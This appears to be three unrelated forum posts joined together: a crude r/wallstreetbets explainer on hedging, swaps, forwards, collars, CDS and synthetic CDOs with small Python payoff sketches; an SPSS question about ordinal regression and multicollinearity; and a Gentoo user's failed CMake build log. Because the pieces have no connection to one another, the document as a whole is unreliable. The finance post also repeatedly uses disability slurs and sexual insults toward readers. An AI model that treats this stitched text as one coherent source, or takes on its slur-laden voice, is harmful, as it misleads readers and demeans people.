
Everything You Always Wanted To Know About Swaps* (*But Were Afraid To Ask)

Hello, dummies
It's your old pal, Fuzzy.
As I'm sure you've all noticed, a lot of the stuff that gets posted here is - to put it delicately - fucking ridiculous. More backwards-ass shit gets posted to wallstreetbets than you'd see on a Westboro Baptist community message board. I mean, I had a look at the daily thread yesterday and..... yeesh. I know, I know. We all make like the divine Laura Dern circa 1992 on the daily and stick our hands deep into this steaming heap of shit to find the nuggets of valuable and/or hilarious information within (thanks for reading, BTW). I agree. I love it just the way it is too. That's what makes WSB great.
What I'm getting at is that a lot of the stuff that gets posted here - notwithstanding it being funny or interesting - is just... wrong. Like, fucking your cousin wrong. And to be clear, I mean the fucking your *first* cousin kinda wrong, before my Southerners in the back get all het up (simmer down, Billy Ray - I know Mabel's twice removed on your grand-sister's side). Truly, I try to let it slide. I do my bit to try and put you on the right path. Most of the time, I sleep easy no matter how badly I've seen someone explain what a bank liquidity crisis is. But out of all of those tens of thousands of misguided, autistic attempts at understanding the world of high finance, one thing gets so consistently - so *emphatically* - fucked up and misunderstood by you retards that last night I felt obligated at the end of a long work day to pull together this edition of Finance with Fuzzy just for you. It's so serious I'm not even going to make a u/pokimane gag. Have you guessed what it is yet? Here's a clue. It's in the title of the post.
That's right, friends. Today in the neighborhood we're going to talk all about hedging in financial markets - spots, swaps, collars, forwards, CDS, synthetic CDOs, all that fun shit. Don't worry; I'm going to explain what all the scary words mean and how they impact your OTM RH positions along the way.
We're going to break it down like this. (1) "What's a hedge, Fuzzy?" (2) Common Hedging Strategies and (3) All About ISDAs and Credit Default Swaps.
Before we begin. For the nerds and JV traders in the back (and anyone else who needs to hear this up front) - I am simplifying these descriptions for the purposes of this post. I am also obviously not going to try and cover every exotic form of hedge under the sun or give a detailed summation of what caused the financial crisis. If you are interested in something specific ask a question, but don't try and impress me with your Investopedia skills or technical points I didn't cover; I will just be forced to flex my years of IRL experience on you in the comments and you'll look like a big dummy.
TL;DR? Fuck you. There is no TL;DR. You've come this far already. What's a few more paragraphs? Put down the Cheetos and try to concentrate for the next 5-7 minutes. You'll learn something, and I promise I'll be gentle.
Ready? Let's get started.
1. The Tao of Risk: Hedging as a Way of Life
The simplest way to characterize what a hedge 'is' is to imagine every action having a binary outcome. One is bad, one is good. Red lines, green lines; uppie, downie. With me so far? Good. A 'hedge' is simply the employment of a strategy to mitigate the effect of your action having the wrong binary outcome. You wanted X, but you got Z! Frowny face. A hedge strategy introduces a third outcome. If you hedged against the possibility of Z happening, then you can wind up with Y instead. Not as good as X, but not as bad as Z. The technical definition I like to give my idiot juniors is as follows:
Utilization of a defensive strategy to mitigate risk, at a fraction of the cost to capital of the risk itself.
Congratulations. You just finished Hedging 101. "But Fuzzy, that's easy! I just sold a naked call against my 95% OTM put! I'm adequately hedged!". Spoiler alert: you're not (although good work on executing a collar, which I describe below). What I'm talking about here is what would be referred to as a 'perfect hedge'; a binary outcome where downside is totally mitigated by a risk management strategy. That's not how it works IRL. Pay attention; this is the tricky part.
You can't take a single position and conclude that you're adequately hedged because risks are fluid, not static. So you need to constantly adjust your position in order to maximize the value of the hedge and insure your position. You also need to consider exposure to more than one category of risk. There are micro (specific exposure) risks, and macro (trend exposure) risks, and both need to factor into the hedge calculus.
That's why, in the real world, the value of hedging depends entirely on the design of the hedging strategy itself. Here, when we say "value" of the hedge, we're not talking about cash money - we're talking about the intrinsic value of the hedge relative to the risk profile of your underlying exposure. To achieve this, people hedge dynamically. In wallstreetbets terms, this means that as the value of your position changes, you need to change your hedges too. The idea is to efficiently and continuously distribute and rebalance risk across different states and periods, taking value from states in which the marginal cost of the hedge is low and putting it back into states where the marginal cost of the hedge is high, until the shadow value of your underlying exposure is equalized across your positions. The punchline, I guess, is that one static position is a hedge in the same way that the finger paintings you make for your wife's boyfriend are art - it's technically correct, but you're only playing yourself by believing it.
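To make "dynamic" concrete, here's a toy sketch (hypothetical position and simple delta-based put hedging - an illustration, not anything resembling a real book): as the stock moves, the put's delta changes, so the number of contracts you need changes with it.

```python
import math

# Toy dynamic-hedging sketch (all numbers hypothetical). You hold 1,000
# shares; each option contract covers 100 shares; a put's delta is negative.

SHARES = 1_000
CONTRACT_SIZE = 100

def contracts_for_delta_hedge(put_delta: float, target: float = 1.0) -> int:
    """Contracts needed so the puts' delta offsets `target` of the share delta."""
    return math.ceil(target * SHARES / (CONTRACT_SIZE * abs(put_delta)))

# As the stock falls toward the strike, the put's delta deepens and you need
# fewer contracts; as it rallies, the delta decays and you need more. That
# drift is exactly why a one-and-done hedge stops being a hedge.
for delta in (-0.15, -0.30, -0.50):
    print(delta, contracts_for_delta_hedge(delta))
```

The point isn't the formula; it's that the answer changes every time the input does, which is why the rebalancing never stops.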
Anyway. Obviously doing this as a small potatoes trader is hard but it's worth taking into account. Enough basic shit. So how does this work in markets?
2. A Hedging Taxonomy
The best place to start here is a practical question. What does a business need to hedge against? Think about the specific risk that an individual business faces. These are legion, so I'm just going to list a few of the key ones that apply to most corporates. (1) You have commodity risk for the shit you buy or the shit you use. (2) You have currency risk for the money you borrow. (3) You have rate risk on the debt you carry. (4) You have offtake risk for the shit you sell. Complicated, right? To help address the many and varied ways that shit can go wrong in a sophisticated market, smart operators like yours truly have devised a whole bundle of different instruments which can help you manage the risk. I might write about some of the more complicated ones in a later post if people are interested (CDO/CLOs, strip/stack hedges and bond swaps with option toggles come to mind) but let's stick to the basics for now.
(i) Swaps
A swap is one of the most common forms of hedge instrument, and they're used by pretty much everyone that can afford them. The language is complicated but the concept isn't, so pay attention and you'll be fine. This is the most important part of this section so it'll be the longest one.
Swaps are derivative contracts with two counterparties (before you ask, you can't trade 'em on an exchange - they're OTC instruments only). They're used to exchange one cash flow for another cash flow of equal expected value; doing this allows you to take speculative positions on certain financial prices or to alter the cash flows of existing assets or liabilities within a business. "Wait, Fuzz; slow down! What do you mean sets of cash flows?". Fear not, little autist. Ol' Fuzz has you covered.
The cash flows I'm talking about are referred to in swap-land as 'legs'. One leg is fixed - a set payment that's the same every time it gets paid - and the other is variable - it fluctuates (typically indexed off the price of the underlying risk that you are speculating on / protecting against). You set it up at the start so that they're notionally equal and the two legs net off; so at open, the swap is a zero NPV instrument. Here's where the fun starts. If the price that you based the variable leg of the swap on changes, the value of the swap will shift; the party on the wrong side of the move ponies up via the variable payment. It's a zero sum game.
I'll give you an example using the most vanilla swap around; an interest rate trade. Here's how it works. You borrow money from a bank, and they charge you a rate of interest. You lock the rate up front, because you're smart like that. But then - quelle surprise! - the rate gets better after you borrow. Now you're bagholding to the tune of, I don't know, 5 bps. Doesn't sound like much but on a billion dollar loan that's a lot of money (a classic example of the kind of 'small, deep hole' that's terrible for profits). Now, if you had a swap contract on the rate before you entered the trade, you're set; if the rate goes down, you get a payment under the swap. If it goes up, whatever payment you're making to the bank is netted off by the fact that you're borrowing at a sub-market rate. Win-win! Or, at least, Lose Less / Lose Less. That's the name of the game in hedging.
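Putting numbers on the "5 bps on a billion" bit - a minimal sketch with a hypothetical 3.00% locked rate, per-year amounts, and no day counts or discounting:

```python
# Hypothetical rate swap hedging a fixed-rate borrowing. You borrowed at a
# locked 3.00%; a receive-fixed swap pays you fixed 3.00% against paying the
# floating market rate, so the net payment hands the rate move back to you.

NOTIONAL = 1_000_000_000   # the billion-dollar loan
FIXED = 0.0300             # locked borrowing rate = swap fixed leg

def net_swap_payment(floating: float) -> float:
    """Receive-fixed swap: positive means the swap pays you."""
    return NOTIONAL * (FIXED - floating)

print(net_swap_payment(0.0295))   # rates drop 5 bps: swap pays you ~$500k/yr
print(net_swap_payment(0.0305))   # rates rise: you pay, but you borrowed sub-market
```

Either way the swap payment and the loan economics net off - the Lose Less / Lose Less from above.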
There are many different kinds of swaps, some of which are pretty exotic; but they're all different variations on the same theme. If your business has exposure to something which fluctuates in price, you trade swaps to hedge against the fluctuation. The valuation of swaps is also super interesting but I guarantee you that 99% of you won't understand it so I'm not going to try and explain it here although I encourage you to google it if you're interested.
Because they're OTC, none of them are filed publicly. Someeeeeetimes you see an ISDA (discussed below) but the confirms themselves (the individual swaps) are not filed. You can usually read about the hedging strategy in a 10-K, though. For what it's worth, most modern credit agreements ban speculative hedging. Top tip: this is occasionally worth checking in the credit agreement when you invest in businesses that are debt issuers - being allowed to hedge speculatively increases the risk profile significantly and is particularly important in times of economic volatility (ctrl+f "non-speculative" in the credit agreement to be sure).
(ii) Forwards
A forward is a contract made today for the future delivery of an asset at a pre-agreed price. That's it. "But Fuzzy! That sounds just like a futures contract!". I know. Confusing, right? Just like a futures trade, forwards are generally used in commodity or forex land to protect against price fluctuations. The differences between forwards and futures are small but significant. I'm not going to go into super boring detail because I don't think many of you are commodities traders but it is still an important thing to understand even if you're just an RH jockey, so stick with me.
Just like swaps, forwards are OTC contracts - they're not publicly traded. This is distinct from futures, which are traded on exchanges (see The Ballad Of Big Dick Vick for some more color on this). In a forward, no money changes hands until the maturity date of the contract when delivery and receipt are carried out; price and quantity are locked in from day 1. As you now know having read about BDV, futures are marked to market daily, and normally people close them out with synthetic settlement using an inverse position. They're also liquid, and that makes them easier to unwind or close out in case shit goes sideways.
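The settlement difference is easier to see with numbers. A toy sketch (hypothetical prices) showing that daily futures margining sums to the same P&L a forward pays once at maturity:

```python
# Forward vs. futures settlement on the same hypothetical trade:
# 1,000 barrels agreed at $50. The forward settles once at maturity;
# the futures position is marked to market every day.

QTY, FWD_PRICE = 1_000, 50.0
daily_settles = [49.0, 51.0, 52.0, 48.0]  # made-up daily futures settlement prices

# Forward: one cash flow at maturity, against the final price.
forward_pnl = QTY * (daily_settles[-1] - FWD_PRICE)

# Futures: a chain of daily variation-margin flows summing to the same total.
prev = FWD_PRICE
margin_flows = []
for settle in daily_settles:
    margin_flows.append(QTY * (settle - prev))
    prev = settle

print(forward_pnl)         # -2000.0: paid once, at the end
print(sum(margin_flows))   # -2000.0: same total, paid along the way
```

Same economics, very different cash and credit profile - which is why futures need margin accounts and forwards need counterparties you trust.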
People use forwards when they absolutely have to get rid of the thing they made (or take delivery of the thing they need). If you're a miner, or a farmer, you use this shit to make sure that at the end of the production cycle, you can get rid of the shit you made (and you won't get fucked by someone taking cash settlement over delivery). If you're a buyer, you use them to guarantee that you'll get whatever the shit is that you'll need at a price agreed in advance. Because they're OTC, you can also exactly tailor them to the requirements of your particular circumstances.
These contracts are incredibly byzantine (and there are even crazier synthetic forwards you can see in money markets for the true degenerate fund managers). In my experience, only Texan oilfield magnates, commodities traders, and the weirdo forex crowd fuck with them. I (i) do not own a 10 gallon hat or a novelty size belt buckle (ii) do not wake up in the middle of the night freaking out about the price of pork fat and (iii) love greenbacks too much to care about other countries' monopoly money, so I don't fuck with them.
(iii) Collars
No, not the kind your wife is encouraging you to try out to 'spice things up' in the bedroom during quarantine. Collars are actually the hedging strategy most applicable to WSB. Collars deal with options! Hooray!
To execute a basic collar (also called a wrapper by tea-drinking Brits and people from the Antipodes), you buy an out of the money put while simultaneously writing a covered call on the same equity. The put protects your position against price drops and writing the call produces income that offsets the put premium. Doing this limits your tendies (you can only profit up to the strike price of the call) but also writes down your risk. If you screen large volume trades with a VOL/OI of more than 3 or 4x (and they're not bullshit biotech stocks), you can sometimes see these being constructed in real time as hedge funds protect themselves on their shorts.
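Here's a minimal payoff sketch of that collar at expiry (hypothetical strikes, and assume the call premium exactly funded the put - a "zero-cost" collar):

```python
# Collar payoff at expiry: long 100 shares bought at $100, long the $90 put,
# short the $110 call. All numbers hypothetical.

SHARES, COST = 100, 100.0
PUT_K, CALL_K = 90.0, 110.0

def collar_pnl(spot: float) -> float:
    stock = spot - COST
    put = max(PUT_K - spot, 0.0)       # protection kicks in below the put strike
    call = -max(spot - CALL_K, 0.0)    # tendies capped above the call strike
    return SHARES * (stock + put + call)

print(collar_pnl(70.0))    # -1000.0: loss floored at the put strike
print(collar_pnl(130.0))   #  1000.0: gain capped at the call strike
print(collar_pnl(105.0))   #   500.0: inside the collar you just track the stock
```

Capped upside, floored downside - exactly the "limits your tendies but writes down your risk" trade-off described above.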
(3) All About ISDAs, CDS and Synthetic CDOs
You may have heard about the mythical ISDA. Much like an indenture (discussed in my post on $F), it's a magic legal machine that lets you build swaps via trade confirms with a willing counterparty. They are very complicated legal documents and you need to be a true expert to fuck with them. Fortunately, I am, so I do. They're made of two parts; a Master (which is a form agreement that's always the same) and a Schedule (which amends the Master to include your specific terms). They are also the engine behind just about every major credit crunch of the last 10+ years.
First - a brief explainer. An ISDA is not in and of itself a hedge - it's an umbrella contract that governs the terms of your swaps, which you use to construct your hedge position. You can trade commodities, forex, rates, whatever, all under the same ISDA.
Let me explain. Remember when we talked about swaps? Right. So. You can trade swaps on just about anything. In the late 90s and early 2000s, people had the smart idea of using other people's debt and/or credit ratings as the variable leg of swap documentation. These are called credit default swaps. I was actually starting out at a bank during this time and, I gotta tell you, the only thing I can compare people's enthusiasm for this shit to was that moment in your early teens when you discover jerking off. Except, unlike your bathroom-bound shame sessions to Mom's Sears catalogue, every single person you know felt that way too; and they're all doing it at once. It was a fiscal circlejerk of epic proportions, and the financial crisis was the inevitable bukkake finish. WSB autism is absolutely no comparison for the enthusiasm people had during this time for lighting each other's money on fire.
Here's how it works. You pick a company. Any company. Maybe even your own! And then you write a swap. In the swap, you define "Credit Event" with respect to that company's debt as the variable leg. And you write in... whatever you want. A ratings downgrade, default under the docs, failure to meet a leverage ratio or FCCR for a certain testing period... whatever. Now, this started out as a hedge position, just like we discussed above. The purest of intentions, of course. But then people realized - if bad shit happens, you make money. And banks... don't like calling in loans or forcing bankruptcies. Can you smell what the moral hazard is cooking?
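The cash flows are simple even if the documentation isn't. A toy sketch (all numbers hypothetical) of the protection buyer's side:

```python
# Toy CDS cash-flow sketch. The protection buyer pays a running premium on
# the notional; if a "Credit Event" hits, the seller pays par minus recovery
# on the reference debt. Discounting ignored.

NOTIONAL = 10_000_000
SPREAD_BPS = 200        # running premium: 200 bps per year
RECOVERY = 0.40         # assumed recovery rate on the defaulted debt

def buyer_pnl(years_paid: float, credit_event: bool) -> float:
    """Net P&L to the protection buyer."""
    premiums = -NOTIONAL * SPREAD_BPS * years_paid / 10_000
    payout = NOTIONAL * (1 - RECOVERY) if credit_event else 0.0
    return premiums + payout

print(buyer_pnl(3, credit_event=False))  # just bleeding premium
print(buyer_pnl(3, credit_event=True))   # "if bad shit happens, you make money"
```

That asymmetry - small steady premiums against one big event payout - is where the moral hazard lives.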
Enter synthetic CDOs. CDOs are basically pools of asset backed securities that invest in debt (loans or bonds). They've been around for a minute but they got famous in the 2000s because a shitload of them containing subprime mortgage debt went belly up in 2008. This got a lot of publicity because a lot of sad looking rednecks got foreclosed on and were interviewed on CNBC. "OH!", the people cried. "Look at those big bad bankers buying up subprime loans! They caused this!". Wrong answer, America. The debt wasn't the problem. What a lot of people don't realize is that the real meat of the problem was not in regular-way CDOs investing in bundles of shit mortgage debt, but in synthetic CDOs investing in CDS predicated on that debt. They're synthetic because they don't have a stake in the actual underlying debt; just the instruments riding on the coattails. The reason these are so popular (and remain so) is that smart structured attorneys and bankers like your faithful correspondent realized that an even more profitable and efficient way of building high yield products with limited downside was investing in instruments that profit from failure of debt and in instruments that rely on that debt, and then hedging that exposure with other CDS instruments in paired trades, and on and on up the chain. The problem with doing this was that everyone wound up exposed to everybody else's books as a result, and when one went tits up, everybody did. Hence, recession, Basel III, etc. Thanks, Obama.
Heavy investment in CDS can also have a warping effect on the price of debt (something else that happened during the pre-financial crisis years and is starting to happen again now). This happens in three different ways. (1) Investors who previously were long on the debt hedge their position by selling CDS protection on the underlying, putting downward pressure on the debt price. (2) Investors who previously shorted the debt switch to buying CDS protection because the relatively illiquid debt (particularly when it's a bond) trades at a discount below par compared to the CDS. The resulting reduction in short selling puts upward pressure on the bond price. (3) The delta between the price and actual value of the debt tempts some investors to become NBTs (neg basis traders) who long the debt and purchase CDS protection. If traders can't take leverage, nothing happens to the price of the debt. If basis traders can take leverage (which is nearly always the case because they're holding a hedged position), they can push up or depress the debt price, goosing swap premiums etc. Anyway. Enough technical details.
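The NBT arithmetic in (3) is just a spread comparison. A back-of-envelope sketch with made-up spreads:

```python
# Back-of-envelope negative-basis arithmetic (made-up spreads, in bps):
# basis = CDS spread - cash bond spread. When it's negative, the basis
# trader longs the bond and buys CDS protection to try to lock in the gap.

cds_spread_bps = 250
bond_spread_bps = 310    # illiquid bond trading cheap relative to the CDS

basis_bps = cds_spread_bps - bond_spread_bps
print(basis_bps)         # negative -> the trade described in (3)

notional = 10_000_000
gross_carry = notional * -basis_bps / 10_000
print(gross_carry)       # per year, before funding costs and leverage
```

A few tens of bps is small money unlevered, which is why these trades only move prices once leverage shows up.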
I could keep going. This is a fascinating topic that is very poorly understood and explained, mainly because the people that caused it all still work on the street and use the same tactics today (it's also terribly taught at business schools because none of the teachers were actually around to see how this played out live). But it relates to the topic of today's lesson, so I thought I'd include it here.
Work depending, I'll be back next week with a covenant breakdown. Most upvoted ticker gets the post.
*EDIT 1\* In a total blowout, $PLAY won. So it's D&B time next week. Post will drop Monday at market open.
submitted by fuzzyblankeet to wallstreetbets

Ordinal regression help

Hi all, I hope someone would be able to shed some light on the analysis that I'm doing for my masters thesis project. I have to analyze pre-existing survey data to determine if there's an association between child maltreatment and life satisfaction. (This is a long one, I'm sorry in advance)
As covid is going on, I’m not able to get prof help in person so I’ve been really struggling and any help is much appreciated!
My exposure variable is child maltreatment and comprises 6 questions, for which the possible response options are 1-5 (never, 1 or 2 times, 3 to 5 times, 6 to 10 times, 10+ times). I want to transform this variable into a binary variable of "ever abused - yes/no" as well as collate it into a joint variable, so the scores will go from 6 (never abused for all 6 items) to 30 (abused 10+ times for all items). The dependent variable is life satisfaction, measured on a scale of 1-10 and condensed into 5 categories, from "very satisfied" to "very dissatisfied". I've been using this grouped 5-category life satisfaction variable as the dependent variable in all my analyses so far - is this appropriate? I'm confused about how these analyses are actually accounting for each category of the dependent variable.
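The two recodes described above can be sketched outside SPSS like this (made-up respondent rows and column names, purely for illustration):

```python
# Sketch of the two recodes: a binary "ever abused" flag and a summed 6-30
# score across the six maltreatment items (coded 1-5, where 1 = "never").
# Rows and column names are hypothetical.

rows = [
    {"cm1": 1, "cm2": 1, "cm3": 2, "cm4": 1, "cm5": 1, "cm6": 1},
    {"cm1": 1, "cm2": 1, "cm3": 1, "cm4": 1, "cm5": 1, "cm6": 1},
    {"cm1": 5, "cm2": 3, "cm3": 1, "cm4": 2, "cm5": 1, "cm6": 4},
]
items = [f"cm{i}" for i in range(1, 7)]

for r in rows:
    r["ever_abused"] = int(any(r[i] > 1 for i in items))  # any item above "never"
    r["cm_score"] = sum(r[i] for i in items)              # 6 (none) .. 30 (max)

print([(r["ever_abused"], r["cm_score"]) for r in rows])
# [(1, 7), (0, 6), (1, 16)]
```

Note the summed score treats the ordinal response bands as if they were equally spaced, which is an assumption worth flagging in the write-up.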
My main question is regarding the analysis. I wanted to do a multiple linear regression, but the dependent variable (life satisfaction) is not normally distributed, so I feel I'm not able to do it that way. My second option is to do an ordinal regression, and I've been testing the assumptions but can't seem to understand how to test assumption 4 (proportional odds). I'm trying to do a binary logistic regression as some posts online suggest, but the values that are computed for df and the -log (logit) values are so large they just can't be right. Is ordinal regression the appropriate analysis to use? And if so, when I am checking assumptions, do I NOT have to clarify which variables I'm using as my confounders/interaction variables and which is my independent variable?
Also, should I be using the newly computed independent variables (the 6-30 count variable and the binary yes/no abused variable)? Or the 6 individual items that pertain to each question on abuse? And if so, am I able to include all of these in the same model? All of my confounders/interaction terms are categorical variables with at least 2 categories and at most 14 categories (age has been collapsed into 14 categories with 5 ages in each group, i.e., 15-19, 20-24, 25-29).
When I checked for multicollinearity, I was told to do a linear regression and include all terms; the categorical variables as their dummy variables (so to include the 3 dummy variables coded for a variable that had initially 4 categories) and if the VIF was larger than 10 then to not include that variable. Is this correct? SPSS ended up showing 6 different variables with VIF values much larger than 10 for several of the categories for each variable so does that mean I just take them out at this step and not even include them in the actual ordinal regression? Two of the problematic variables were two of the items on abuse, so when I removed one from the analysis then the other’s VIF value significantly dropped below 10. So in this case would I modify the joint 6-30 count variable on abuse to only be 5-25?
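For sanity-checking those VIF numbers outside SPSS: VIF is just 1/(1 - R²) from regressing each predictor (dummy columns included) on all the others. A sketch with toy data:

```python
import numpy as np

# VIF_j = 1 / (1 - R^2_j), where R^2_j comes from regressing predictor j on
# the remaining predictors. Toy data; the rule of thumb above is VIF > 10.

def vif(X: np.ndarray) -> np.ndarray:
    """One VIF per column of the predictor matrix X."""
    n, k = X.shape
    out = np.empty(k)
    for j in range(k):
        y = X[:, j]
        others = np.column_stack([np.ones(n), np.delete(X, j, axis=1)])
        beta, *_ = np.linalg.lstsq(others, y, rcond=None)
        resid = y - others @ beta
        r2 = 1.0 - (resid @ resid) / ((y - y.mean()) ** 2).sum()
        out[j] = 1.0 / (1.0 - r2)
    return out

rng = np.random.default_rng(0)
a = rng.normal(size=200)
b = a + rng.normal(scale=0.05, size=200)   # nearly collinear with a
c = rng.normal(size=200)
v = vif(np.column_stack([a, b, c]))
print(v.round(1))  # a and b blow up; c stays near 1
```

This also shows why dropping one of a collinear pair tames the other's VIF, exactly as happened with the two abuse items.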
I’m so sorry for all the questions, I know this is such a ramble but if anyone has any experience with ordinal regression in SPSS and is willing to spare a few mins to speak with me I would be forever grateful! Thank you in advance!
submitted by amm173 to spss

Installing CMake requires CMake?

Hello all,
I've been away from Gentoo for a year, but I'm coming back and trying to install it on a Lenovo Thinkpad X250. My goal is Gentoo without systemd, with Wayland and Sway, eventually migrating (once stable) to hardened+selinux. I used the current-stage3-amd64 build and followed Full Disk Encryption From Scratch Simplified. My system boots perfectly to runlevel 3 and has no issues with LUKS or networking.
Since first boot, I have installed lm-sensors and laptop-mode-tools, following the wiki for appropriate kernel options to recompile with. Then I wanted to install Wayland + Sway, so I installed dev-libs/wayland, then tried installing gui-wm/sway, but the dependencies failed on graphite2.
I updated the system with emerge -avuDU --keep-going --with-bdeps=y @world, I think graphite2 finished at that point, but then another dependency failed to install. One of the lines was meson: command not found, so I installed meson. Repeat. "ninja: command not found". So I install ninja. Repeat. "cmake: command not found". So I try to install cmake. Except when I install cmake, I get "cmake: command not found".
Is something wrong with my installation? I don't remember these issues last year, and was able to get to an X11/KDE environment without issue.

Here is my build.log for cmake
 * Package:    dev-util/cmake-3.14.6
 * Repository: gentoo
 * Maintainer: [email protected]
 * USE:        abi_x86_64 amd64 elibc_glibc kernel_linux ncurses userland_GNU
 * FEATURES:   network-sandbox preserve-libs sandbox userpriv usersandbox
>>> Unpacking source...
>>> Unpacking cmake-3.14.6.tar.gz to /var/tmp/portage/dev-util/cmake-3.14.6/work
>>> Source unpacked in /var/tmp/portage/dev-util/cmake-3.14.6/work
>>> Preparing source in /var/tmp/portage/dev-util/cmake-3.14.6/work/cmake-3.14.6 ...
 * Applying cmake-3.4.0_rc1-darwin-bundle.patch ... [ ok ]
 * Applying cmake-3.14.0_rc3-prefix-dirs.patch ... [ ok ]
 * Applying cmake-3.14.0_rc1-FindBLAS.patch ... [ ok ]
 * Applying cmake-3.14.0_rc1-FindLAPACK.patch ... [ ok ]
 * Applying cmake-3.5.2-FindQt4.patch ... [ ok ]
 * Applying cmake- ...
patching file Modules/FindPythonLibs.cmake
Hunk #1 succeeded at 117 with fuzz 2 (offset 43 lines).
 [ ok ]
 * Applying cmake-3.9.0_rc2-FindPythonInterp.patch ... [ ok ]
 * Working in BUILD_DIR: "/var/tmp/portage/dev-util/cmake-3.14.6/work/cmake-3.14.6_build"
 * Hardcoded definition(s) removed in CMakeLists.txt:
 *   set(CMAKE_INSTALL_PREFIX "${CMAKE_INSTALL_PREFIX}/")
 * Hardcoded definition(s) removed in Tests/JavaJavah/CMakeLists.txt:
 *   set(CMAKE_VERBOSE_MAKEFILE 1)
 * Hardcoded definition(s) removed in Tests/QtAutogen/UicInterface/CMakeLists.txt:
 *   set(CMAKE_VERBOSE_MAKEFILE ON)
 * Hardcoded definition(s) removed in Tests/JavaNativeHeaders/CMakeLists.txt:
 *   set(CMAKE_VERBOSE_MAKEFILE 1)
 * Hardcoded definition(s) removed in Tests/Qt4Deploy/CMakeLists.txt:
 *   set(CMAKE_INSTALL_PREFIX ${CMAKE_CURRENT_BINARY_DIR}/install)
 * Hardcoded definition(s) removed in Tests/CPackComponents/CMakeLists.txt:
 *   set(CMAKE_INSTALL_PREFIX "/opt/mylib")
 * Hardcoded definition(s) removed in Tests/SetLang/CMakeLists.txt:
 *   set(CMAKE_VERBOSE_MAKEFILE 1)
 * Hardcoded definition(s) removed in Tests/CMakeOnly/SelectLibraryConfigurations/CMakeLists.txt:
 *   set(CMAKE_BUILD_TYPE Debug)
 * Hardcoded definition(s) removed in Tests/CMakeOnly/CheckCXXCompilerFlag/CMakeLists.txt:
 *   set(CMAKE_VERBOSE_MAKEFILE 1)
 * Hardcoded definition(s) removed in Tests/Java/CMakeLists.txt:
 *   set(CMAKE_VERBOSE_MAKEFILE 1)
 * Hardcoded definition(s) removed in Tests/Assembler/CMakeLists.txt:
 *   set(CMAKE_VERBOSE_MAKEFILE 1)
 * Hardcoded definition(s) removed in Tests/FindPackageTest/CMakeLists.txt:
 *   set(CMAKE_INSTALL_PREFIX "${CMAKE_CURRENT_BINARY_DIR}/NotDefaultPrefix")
 * Hardcoded definition(s) removed in Tests/OutDir/CMakeLists.txt:
 *   set(CMAKE_BUILD_TYPE)
 *   set(CMAKE_BUILD_TYPE Debug)
 * Hardcoded definition(s) removed in Tests/RunCMake/CPack/CMakeLists.txt:
 *   set(CMAKE_BUILD_TYPE "Debug" CACHE STRING "")
 * Hardcoded definition(s) removed in Tests/JavaExportImport/BuildExport/CMakeLists.txt:
 *   set(CMAKE_VERBOSE_MAKEFILE 1)
 * Hardcoded definition(s) removed in Tests/JavaExportImport/InstallExport/CMakeLists.txt:
 *   set(CMAKE_VERBOSE_MAKEFILE 1)
 * Hardcoded definition(s) removed in Tests/JavaExportImport/Import/CMakeLists.txt:
 *   set(CMAKE_VERBOSE_MAKEFILE 1)
 * Hardcoded definition(s) removed in Tests/Fortran/CMakeLists.txt:
 *   set(CMAKE_VERBOSE_MAKEFILE 1)
 * Hardcoded definition(s) removed in Tests/SubDirSpaces/CMakeLists.txt:
 *   set(CMAKE_VERBOSE_MAKEFILE 1)
 * Hardcoded definition(s) removed in Tests/CMakeCommands/target_compile_features/CMakeLists.txt:
 *   set(CMAKE_VERBOSE_MAKEFILE ON)
>>> Source prepared.
>>> Configuring source in /var/tmp/portage/dev-util/cmake-3.14.6/work/cmake-3.14.6 ...
 * Working in BUILD_DIR: "/var/tmp/portage/dev-util/cmake-3.14.6/work/cmake-3.14.6_build"
cmake -C /var/tmp/portage/dev-util/cmake-3.14.6/work/cmake-3.14.6_build/gentoo_common_config.cmake -G Unix Makefiles -DCMAKE_INSTALL_PREFIX=/usr -DCMAKE_USE_SYSTEM_LIBRARIES=ON -DCMAKE_USE_SYSTEM_LIBRARY_JSONCPP=no -DCMAKE_INSTALL_PREFIX=/usr -DCMAKE_DOC_DIR=/share/doc/cmake-3.14.6 -DCMAKE_MAN_DIR=/share/man -DCMAKE_DATA_DIR=/share/cmake -DSPHINX_MAN=no -DSPHINX_HTML=no -DBUILD_CursesDialog=yes -DBUILD_TESTING=no -DCMAKE_BUILD_TYPE=Gentoo -DCMAKE_TOOLCHAIN_FILE=/var/tmp/portage/dev-util/cmake-3.14.6/work/cmake-3.14.6_build/gentoo_toolchain.cmake /var/tmp/portage/dev-util/cmake-3.14.6/work/cmake-3.14.6
/var/tmp/portage/dev-util/cmake-3.14.6/temp/environment: line 920: cmake: command not found
 * ERROR: dev-util/cmake-3.14.6::gentoo failed (configure phase):
 *   cmake failed
 *
 * Call stack:
 *   , line 125: Called src_configure
 *   environment, line 2230: Called cmake_src_configure
 *   environment, line 920: Called die
 * The specific snippet of code:
 *   "${CMAKE_BINARY}" "${cmakeargs[@]}" "${CMAKE_USE_DIR}" || die "cmake failed";
 *
 * If you need support, post the output of `emerge --info '=dev-util/cmake-3.14.6::gentoo'`,
 * the complete build log and the output of `emerge -pqv '=dev-util/cmake-3.14.6::gentoo'`.
 * The complete build log is located at '/var/tmp/portage/dev-util/cmake-3.14.6/temp/build.log'.
 * The ebuild environment file is located at '/var/tmp/portage/dev-util/cmake-3.14.6/temp/environment'.
 * Working directory: '/var/tmp/portage/dev-util/cmake-3.14.6/work/cmake-3.14.6_build'
 * S: '/var/tmp/portage/dev-util/cmake-3.14.6/work/cmake-3.14.6'
And the output from emerge --info '=dev-util/cmake-3.14.6::gentoo'
Portage 2.3.84 (python 3.6.9-final-0, default/linux/amd64/17.1, gcc-9.2.0, glibc-2.29-r7, 4.19.97-gentoo-x86_64 x86_64)
=================================================================
System Settings
=================================================================
System uname: Lin[email protected]_2.30GHz-with-gentoo-2.6
KiB Mem:  16292612 total, 15779948 free
KiB Swap:  4194300 total,  4194300 free
Timestamp of repository gentoo: Mon, 03 Feb 2020 00:45:01 +0000
Head commit of repository gentoo: cf12d7fd5d98f5209513bcc9b93388e98d785fd5
sh bash 4.4_p23-r1
ld GNU ld (Gentoo 2.32 p2) 2.32.0
app-shells/bash:          4.4_p23-r1::gentoo
dev-lang/perl:            5.30.1::gentoo
dev-lang/python:          2.7.17::gentoo, 3.6.9::gentoo
dev-util/cmake:           3.14.6::gentoo
sys-apps/baselayout:      2.6-r1::gentoo
sys-apps/openrc:          0.42.1::gentoo
sys-apps/sandbox:         2.13::gentoo
sys-devel/autoconf:       2.69-r4::gentoo
sys-devel/automake:       1.16.1-r1::gentoo
sys-devel/binutils:       2.32-r1::gentoo
sys-devel/gcc:            9.2.0-r2::gentoo
sys-devel/gcc-config:     2.1::gentoo
sys-devel/libtool:        2.4.6-r6::gentoo
